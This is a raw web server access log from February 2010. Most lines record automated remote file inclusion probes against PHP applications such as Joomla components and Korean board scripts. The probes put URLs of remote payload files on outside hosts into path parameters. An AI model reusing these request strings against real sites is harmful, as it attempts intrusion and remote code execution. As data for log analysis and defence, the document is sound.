209.59.12.99 - - [23/Feb/2010:03:47:49 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
221.143.46.124 - - [23/Feb/2010:03:47:55 -0500] "GET /?sourcedir=http://www.trilk.com/phpcookbook//images/images.jpg????&mode=id HTTP/1.1" 200 409 "-" "-"
70.86.5.10 - - [23/Feb/2010:03:49:05 -0500] "GET /logs/error_log.Q110020800//templates/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
70.86.5.10 - - [23/Feb/2010:03:49:05 -0500] "GET /logs/access_log.Q109070700//templates/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
70.86.5.10 - - [23/Feb/2010:03:49:05 -0500] "GET //templates/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
70.86.5.10 - - [23/Feb/2010:03:49:05 -0500] "GET /logs//templates/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
202.167.221.65 - - [23/Feb/2010:03:49:22 -0500] "GET //contenido/cronjobs/cronjobs.php.php?cfg[path][contenido]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
202.167.221.65 - - [23/Feb/2010:03:49:23 -0500] "GET /logs/access_log.Q109111700%20%20//contenido/cronjobs/cronjobs.php.php?cfg[path][contenido]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
202.167.221.65 - - [23/Feb/2010:03:49:25 -0500] "GET /logs//contenido/cronjobs/cronjobs.php.php?cfg[path][contenido]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
186.28.232.13 - - [23/Feb/2010:03:49:55 -0500] "GET /logs/access_log.Q109070700//templates/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
186.28.232.13 - - [23/Feb/2010:03:49:55 -0500] "GET //templates/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
186.28.232.13 - - [23/Feb/2010:03:49:55 -0500] "GET /logs//templates/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
186.28.232.13 - - [23/Feb/2010:03:49:55 -0500] "GET /logs/error_log.Q110020800//templates/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
67.19.13.194 - - [23/Feb/2010:03:50:44 -0500] "GET //index.php?page=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
67.19.13.194 - - [23/Feb/2010:03:50:44 -0500] "GET //index.php?page=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
67.19.13.194 - - [23/Feb/2010:03:51:00 -0500] "GET /logs//index.php?page=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
67.19.13.194 - - [23/Feb/2010:03:51:00 -0500] "GET /logs//index.php?page=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
221.143.46.124 - - [23/Feb/2010:03:52:28 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.trilk.com/phpcookbook//images/images.jpg????&mode=id HTTP/1.1" 200 454 "-" "-"
203.115.131.17 - - [23/Feb/2010:03:52:55 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 200 39479 "-" "Mozilla/5.0"
203.115.131.17 - - [23/Feb/2010:03:52:56 -0500] "GET /logs/access_log.Q109121700//?_SERVER[DOCUMENT_ROOT]=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
203.115.131.17 - - [23/Feb/2010:03:52:57 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
67.195.115.186 - - [23/Feb/2010:03:53:31 -0500] "GET /images/_notes/circle_CD_video.jpg.mno HTTP/1.0" 200 250 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
64.202.102.218 - - [23/Feb/2010:03:53:37 -0500] "GET /logs/error_log.Q109111000//?mosConfig_absolute_path=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
64.202.102.218 - - [23/Feb/2010:03:53:37 -0500] "GET /logs/access_log.Q109111700//?mosConfig_absolute_path=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
64.202.102.218 - - [23/Feb/2010:03:53:37 -0500] "GET //?mosConfig_absolute_path=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
64.202.102.218 - - [23/Feb/2010:03:53:37 -0500] "GET /logs//?mosConfig_absolute_path=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 200 39479 "-" "Mozilla/5.0"
203.115.131.17 - - [23/Feb/2010:03:53:58 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 200 39479 "-" "Mozilla/5.0"
203.115.131.17 - - [23/Feb/2010:03:53:58 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
211.117.2.17 - - [23/Feb/2010:03:53:59 -0500] "GET //skin/dognara_frame/setup.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.117.2.17 - - [23/Feb/2010:03:53:59 -0500] "GET /logs//skin/dognara_frame/setup.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
211.117.2.17 - - [23/Feb/2010:03:53:59 -0500] "GET /logs/access_log.Q109102900//skin/dognara_frame/setup.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
203.115.131.17 - - [23/Feb/2010:03:54:06 -0500] "GET /logs/access_log.Q109121700%20%20//?_SERVER[DOCUMENT_ROOT]=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
117.74.98.18 - - [23/Feb/2010:03:54:22 -0500] "GET /logs/error_log.Q109071100//include/bbs.lib.inc.php?site_path=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
221.143.46.124 - - [23/Feb/2010:03:55:43 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.trilk.com/phpcookbook//images/images.jpg????&mode=id HTTP/1.1" 404 256 "-" "-"
221.143.46.124 - - [23/Feb/2010:03:55:44 -0500] "GET /logs/error_log.Q109072700%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.trilk.com/phpcookbook//images/images.jpg????&mode=id HTTP/1.1" 404 278 "-" "-"
221.143.46.124 - - [23/Feb/2010:03:55:44 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.trilk.com/phpcookbook//images/images.jpg????&mode=id HTTP/1.1" 404 251 "-" "-"
209.59.12.99 - - [23/Feb/2010:03:57:04 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
221.143.46.124 - - [23/Feb/2010:03:57:59 -0500] "GET //bemarket/postscript/postscript.php?p_mode=http://www.trilk.com/phpcookbook//images/images.jpg????&mode=id HTTP/1.1" 404 233 "-" "-"
203.115.131.17 - - [23/Feb/2010:03:58:54 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
203.115.131.17 - - [23/Feb/2010:03:58:54 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 200 39479 "-" "Mozilla/5.0"
203.115.131.17 - - [23/Feb/2010:03:58:54 -0500] "GET /logs/access_log.Q109121700//?_SERVER[DOCUMENT_ROOT]=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
123.143.29.250 - - [23/Feb/2010:04:00:04 -0500] "GET /logs/access_log.Q110020500%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
123.143.29.250 - - [23/Feb/2010:04:00:04 -0500] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
123.143.29.250 - - [23/Feb/2010:04:00:04 -0500] "GET //kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
64.202.102.218 - - [23/Feb/2010:04:01:01 -0500] "GET //?mosConfig_absolute_path=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
64.202.102.218 - - [23/Feb/2010:04:01:01 -0500] "GET /logs/access_log.Q109111700%20%20//?mosConfig_absolute_path=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
64.202.102.218 - - [23/Feb/2010:04:01:01 -0500] "GET /logs//?mosConfig_absolute_path=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 200 39479 "-" "Mozilla/5.0"
67.195.115.186 - - [23/Feb/2010:04:02:02 -0500] "GET /images/_notes/circle_convention_over.jpg.mno HTTP/1.0" 200 197 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
203.115.131.17 - - [23/Feb/2010:04:03:48 -0500] "GET /logs/access_log.Q109121700%20%20//?_SERVER[DOCUMENT_ROOT]=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
118.217.216.132 - - [23/Feb/2010:04:03:49 -0500] "GET /logs/access_log.Q109111700//?mosConfig_absolute_path=http://eeq.50webs.com/log.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.816"
118.217.216.132 - - [23/Feb/2010:04:03:50 -0500] "GET //?mosConfig_absolute_path=http://eeq.50webs.com/log.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.816"
118.217.216.132 - - [23/Feb/2010:04:03:51 -0500] "GET /logs//?mosConfig_absolute_path=http://eeq.50webs.com/log.txt??? HTTP/1.1" 200 39479 "-" "libwww-perl/5.816"
118.217.216.132 - - [23/Feb/2010:04:03:53 -0500] "GET /logs/error_log.Q109111000//?mosConfig_absolute_path=http://eeq.50webs.com/log.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.816"
61.111.3.35 - - [23/Feb/2010:04:04:15 -0500] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
61.111.3.35 - - [23/Feb/2010:04:04:15 -0500] "GET /logs/access_log.Q109102900//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
61.111.3.35 - - [23/Feb/2010:04:04:15 -0500] "GET //kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
211.95.78.56 - - [23/Feb/2010:04:04:31 -0500] "GET /r//?_SERVER[DOCUMENT_ROOT]=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 201 "-" "Mozilla/5.0"
211.95.78.56 - - [23/Feb/2010:04:04:33 -0500] "GET /logs/access_log.Q109111700%20%20/r//?_SERVER[DOCUMENT_ROOT]=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
211.95.78.56 - - [23/Feb/2010:04:04:33 -0500] "GET /logs/r//?_SERVER[DOCUMENT_ROOT]=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
76.115.6.227 - - [23/Feb/2010:04:04:53 -0500] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):atrisorb HTTP/1.1" 200 38020 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 GTB6 (.NET CLR 3.5.30729)"
76.115.6.227 - - [23/Feb/2010:04:05:00 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LL233B65B3A86A800BFF3076+M37+ENG HTTP/1.1" 200 38018 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):atrisorb" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 GTB6 (.NET CLR 3.5.30729)"
66.254.98.142 - - [23/Feb/2010:04:05:03 -0500] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 247 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
66.254.98.142 - - [23/Feb/2010:04:05:03 -0500] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 242 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
186.28.232.13 - - [23/Feb/2010:04:05:04 -0500] "GET /logs//templates/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
186.28.232.13 - - [23/Feb/2010:04:05:04 -0500] "GET /logs/access_log.Q109060600//templates/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
186.28.232.13 - - [23/Feb/2010:04:05:04 -0500] "GET /logs/access_log.Q109091000//templates/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
186.28.232.13 - - [23/Feb/2010:04:05:04 -0500] "GET //templates/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
209.59.12.99 - - [23/Feb/2010:04:05:05 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
58.230.162.220 - - [23/Feb/2010:04:05:06 -0500] "GET ///bbs//write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:04:05:06 -0500] "GET /logs/access_log.Q110012400%20%20///bbs//write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:04:05:06 -0500] "GET /logs///bbs//write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:04:05:12 -0500] "GET /logs/access_log.Q110020800%20%20///bbs//write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:04:05:14 -0500] "GET ///bbs//write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:04:05:14 -0500] "GET /logs/access_log.Q110012400%20%20///bbs//write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:04:05:14 -0500] "GET /logs///bbs//write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.95.78.56 - - [23/Feb/2010:04:05:18 -0500] "GET /logs/access_log.Q110011800%20%20/r//?_SERVER[DOCUMENT_ROOT]=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:04:05:19 -0500] "GET /logs/access_log.Q110020800%20%20///bbs//write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
221.141.1.113 - - [23/Feb/2010:04:05:40 -0500] "GET /logs/bbs/delete_all.php?board_skin_path=http://www.screengolf9475.com/bbs/img/id1???? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
221.141.1.113 - - [23/Feb/2010:04:05:40 -0500] "GET /logs/access_log.Q110020800%20%20/bbs/delete_all.php?board_skin_path=http://www.screengolf9475.com/bbs/img/id1???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
221.141.1.113 - - [23/Feb/2010:04:05:40 -0500] "GET /bbs/delete_all.php?board_skin_path=http://www.screengolf9475.com/bbs/img/id1???? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
221.141.1.113 - - [23/Feb/2010:04:05:40 -0500] "GET /logs/access_log.Q110012700%20%20/bbs/delete_all.php?board_skin_path=http://www.screengolf9475.com/bbs/img/id1???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
82.76.118.170 - - [23/Feb/2010:04:05:51 -0500] "GET /logs/access_log.Q110011600//component/option/com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://junny.net/userfiles/image/.id? HTTP/1.1" 404 267 "-" "libwww-perl/5.816"
82.76.118.170 - - [23/Feb/2010:04:05:51 -0500] "GET //component/option/com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://junny.net/userfiles/image/.id? HTTP/1.1" 404 240 "-" "libwww-perl/5.816"
82.76.118.170 - - [23/Feb/2010:04:05:52 -0500] "GET /logs//component/option/com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://junny.net/userfiles/image/.id? HTTP/1.1" 404 245 "-" "libwww-perl/5.816"
80.67.28.152 - - [23/Feb/2010:04:05:56 -0500] "GET /logs/myevent.php?myevent_path=http://eremitaw.interfree.it/id1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
211.95.78.56 - - [23/Feb/2010:04:05:56 -0500] "GET /logs/r//?_SERVER[DOCUMENT_ROOT]=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
211.95.78.56 - - [23/Feb/2010:04:05:56 -0500] "GET /logs/access_log.Q109111700%20%20/r//?_SERVER[DOCUMENT_ROOT]=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
211.95.78.56 - - [23/Feb/2010:04:05:56 -0500] "GET /r//?_SERVER[DOCUMENT_ROOT]=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 201 "-" "Mozilla/5.0"
70.86.5.10 - - [23/Feb/2010:04:06:00 -0500] "GET /logs/access_log.Q109091000//templates/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
70.86.5.10 - - [23/Feb/2010:04:06:00 -0500] "GET //templates/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
70.86.5.10 - - [23/Feb/2010:04:06:00 -0500] "GET /logs//templates/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
70.86.5.10 - - [23/Feb/2010:04:06:01 -0500] "GET /logs/access_log.Q109060600//templates/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
198.145.42.146 - - [23/Feb/2010:04:06:22 -0500] "GET /logs/access_log.Q110011600//component/option/com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=wew? HTTP/1.1" 404 267 "-" "libwww-perl/5.79"
198.145.42.146 - - [23/Feb/2010:04:06:22 -0500] "GET //component/option/com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=wew? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
198.145.42.146 - - [23/Feb/2010:04:06:22 -0500] "GET /logs//component/option/com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=wew? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
211.95.78.56 - - [23/Feb/2010:04:06:37 -0500] "GET /logs/access_log.Q110011800%20%20/r//?_SERVER[DOCUMENT_ROOT]=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
80.67.28.152 - - [23/Feb/2010:04:06:50 -0500] "GET /myevent.php?myevent_path=http://eremitaw.interfree.it/id1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
80.67.28.152 - - [23/Feb/2010:04:06:54 -0500] "GET /logs/myevent.php?myevent_path=http://eremitaw.interfree.it/id1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
89.36.175.10 - - [23/Feb/2010:04:06:56 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.frentesdeseguridad.gov.co/images/stories/id1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
89.36.175.10 - - [23/Feb/2010:04:06:56 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.frentesdeseguridad.gov.co/images/stories/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
89.36.175.10 - - [23/Feb/2010:04:06:56 -0500] "GET /logs/access_log.Q110021000%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.frentesdeseguridad.gov.co/images/stories/id1.txt??? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
61.111.3.35 - - [23/Feb/2010:04:07:07 -0500] "GET /logs/access_log.Q110020500//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
24.155.77.219 - - [23/Feb/2010:04:07:07 -0500] "GET /index.htm HTTP/1.1" 200 870 "http://www.palisadesdental-llc.com/sales.asp" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)Accept-Encoding: gzip, deflate"
89.36.175.10 - - [23/Feb/2010:04:07:34 -0500] "GET /logs/access_log.Q109062700%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.frentesdeseguridad.gov.co/images/stories/id1.txt??? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
119.73.43.5 - - [23/Feb/2010:04:08:10 -0500] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
119.73.43.5 - - [23/Feb/2010:04:08:10 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
218.38.243.44 - - [23/Feb/2010:04:08:11 -0500] "GET ///bbs//write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
218.38.243.44 - - [23/Feb/2010:04:08:11 -0500] "GET /logs/access_log.Q110012400%20%20///bbs//write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
218.38.243.44 - - [23/Feb/2010:04:08:11 -0500] "GET /logs///bbs//write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
82.76.118.170 - - [23/Feb/2010:04:08:11 -0500] "GET //component/option/com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://junny.net/userfiles/image/.id? HTTP/1.1" 404 240 "-" "libwww-perl/5.816"
89.36.175.10 - - [23/Feb/2010:04:08:23 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.frentesdeseguridad.gov.co/images/stories/id1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
89.36.175.10 - - [23/Feb/2010:04:08:23 -0500] "GET /logs/access_log.Q110021000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.frentesdeseguridad.gov.co/images/stories/id1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
89.36.175.10 - - [23/Feb/2010:04:08:23 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.frentesdeseguridad.gov.co/images/stories/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
218.38.243.44 - - [23/Feb/2010:04:08:32 -0500] "GET /logs///bbs//write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
218.38.243.44 - - [23/Feb/2010:04:08:32 -0500] "GET /logs/access_log.Q110012400%20%20///bbs//write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
218.38.243.44 - - [23/Feb/2010:04:08:32 -0500] "GET ///bbs//write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
67.195.115.186 - - [23/Feb/2010:04:08:34 -0500] "GET /images/_notes/ace_bkgrd_wide_r1_c1.gif.mno HTTP/1.0" 200 263 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
61.111.3.35 - - [23/Feb/2010:04:08:38 -0500] "GET /logs/access_log.Q109081000//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
118.217.216.132 - - [23/Feb/2010:04:08:50 -0500] "GET //?mosConfig_absolute_path=http://eeq.50webs.com/log.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.816"
89.36.175.10 - - [23/Feb/2010:04:09:02 -0500] "GET /logs/access_log.Q109062700//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.frentesdeseguridad.gov.co/images/stories/id1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
198.145.42.146 - - [23/Feb/2010:04:09:23 -0500] "GET /logs/access_log.Q110011600//component/option/com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=wew? HTTP/1.1" 404 267 "-" "libwww-perl/5.79"
198.145.42.146 - - [23/Feb/2010:04:09:23 -0500] "GET //component/option/com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=wew? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
198.145.42.146 - - [23/Feb/2010:04:09:23 -0500] "GET /logs//component/option/com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=wew? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
198.145.42.146 - - [23/Feb/2010:04:09:51 -0500] "GET //component/option/com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=wew? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
200.93.147.154 - - [23/Feb/2010:04:09:52 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.frentesdeseguridad.gov.co/images/stories/id1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
